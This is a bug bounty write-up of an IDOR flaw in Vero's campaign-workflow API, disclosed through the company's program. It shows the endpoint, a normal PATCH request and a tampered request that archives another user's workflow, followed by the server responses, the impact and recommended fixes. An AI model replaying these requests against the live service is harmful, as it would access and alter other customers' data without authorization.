Hi, I'm Hasan Khan, a Web Application Penetration Security researcher and bug bounty hunter from Bangladesh. I specialize in ethical hacking, vulnerability analysis, and dynamic application security testing. While testing the Vero platform, I discovered a critical Insecure Direct Object Reference (IDOR) vulnerability that allowed me to access and archive campaign workflows belonging to other usersβ€”simply by manipulating the workflow ID.

This writeup explains how I found the issue, its impact, and how it was responsibly disclosed. I'm proud to share that this vulnerability was rewarded with USD $150 by Vero's security team.

πŸ•΅οΈ Vulnerability Summary

The vulnerability was found in the following endpoint:

http PATCH /api/v1/campaign-workflows/{workflow_id}

By replacing the workflow_id with another user's archived workflow ID, I was able to successfully archive or access their campaign workflow. The server responded with a 200 OK status, confirming the unauthorized action.

πŸ§ͺ Steps to Reproduce

1. βœ… Normal Request (Archiving My Own Workflow)

This is a legitimate request to archive a campaign workflow that belongs to my account:

PATCH /api/v1/campaign-workflows/25351
Host: internal-api.app.getvero.com
Content-Type: application/vnd.api+json
{
  "data": {
    "attributes": {
      "active": false
    },
    "type": "campaign-workflows"
  }
}

πŸ“Œ Result: The server responded with HTTP/2 200 OK, and my workflow with ID 25351 was successfully archived.

2. ❌ Tampered Request (Archiving Another User's Workflow)

By simply changing the workflow ID to another user's archived campaign (e.g., 25352), I was able to archive their workflow without any authorization checks:

PATCH /api/v1/campaign-workflows/25352

πŸ“Œ Result: The server again responded with HTTP/2 200 OK, and returned the following data:

{
  "data": {
    "id": "25352",
    "type": "campaign-workflows",
    "attributes": {
      "title": "Other User's Campaign",
      "active": false,
      ...
    }
  }
}

βœ… This confirmed that I could access and modify another user's archived campaign workflow β€” demonstrating a clear IDOR vulnerability.

⚠️ Impact

  • Any authenticated user could archive, view, or potentially modify workflows belonging to other accounts.
  • This exposes sensitive business logic, marketing strategies, and workflow data.
  • In a multi-tenant SaaS environment, this is a critical vulnerability that breaks tenant isolation.

βœ… Recommendations

To prevent this vulnerability, I recommend: - Implementing object-level authorization checks to verify ownership before processing requests. - Using opaque or randomized identifiers instead of predictable numeric IDs. - Logging and monitoring access patterns to detect suspicious behavior.

πŸ“ Vulnerability Disclosure Program & Reward

I reported this vulnerability to Vero's security team through their Vulnerability Disclosure Program They classified it as a P3 (medium severity) and awarded me USD $150 for being the first to report it. I appreciate their quick response and professionalism.

πŸ“© Here's a snippet from their response:

> "You are the first to report this vulnerability. We reward P3 tickets at USD $150. Thank you for reporting this finding and for your hard workβ€”we absolutely appreciate it!"

None

🎯 Final Thoughts

This finding reinforces the importance of access control validation in API endpoints. Even simple ID manipulation can lead to serious data exposure if authorization checks are missing. I encourage developers to audit their APIs regularly and bug bounty hunters to keep exploring responsibly.

🌐 Follow with Me

If you found this writeup helpful or inspiring, follow me for more vulnerability reports, security guides, and community resources:

- LinkedIn: https://www.linkedin.com/in/hasankhan0x - Twitter (X): https://twitter.com/Hasan_Khan0X